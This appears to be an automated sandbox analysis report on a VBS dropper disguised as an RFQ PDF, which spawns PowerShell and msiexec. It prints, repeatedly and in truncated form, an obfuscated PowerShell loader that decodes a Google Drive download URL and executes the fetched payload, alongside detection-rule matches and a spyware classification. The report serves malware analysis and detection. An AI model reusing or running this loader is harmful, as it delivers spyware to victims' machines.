              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49867 version: TLS 1.2

              System Summary

              barindex
              Source: amsi64_3300.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_5432.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B88D2F21_2_00007FFD9B88D2F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B88C5461_2_00007FFD9B88C546
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB0026A1_2_00007FFD9BB0026A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0043E9888_2_0043E988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_004353218_2_00435321
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00433E128_2_00433E12
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_004371188_2_00437118
              Source: RFQ_64182MR_PDF.R00.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7095
              Source: unknownProcess created: Commandline size = 7095
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7095Jump to behavior
              Source: amsi64_3300.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_5432.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/7@6/6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Platyhelminthic195.EndJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_goiohz1b.t1i.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3300
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5432
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RFQ_64182MR_PDF.R00.vbsReversingLabs: Detection: 26%
              Source: RFQ_64182MR_PDF.R00.vbsVirustotal: Detection: 25%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
